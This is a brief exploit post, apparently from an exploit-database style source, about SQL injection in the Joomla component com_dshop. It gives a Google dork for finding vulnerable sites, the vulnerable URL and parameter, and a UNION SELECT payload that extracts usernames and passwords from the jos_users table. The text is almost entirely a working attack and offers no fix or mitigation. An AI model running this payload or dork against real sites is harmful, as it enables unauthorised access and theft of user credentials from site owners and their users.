Joomla Component (com_dshop) SQL Injection



Google Dork : inurl:com_dshop
SQL Vulnerability:

http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)

SQL Exploit

+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users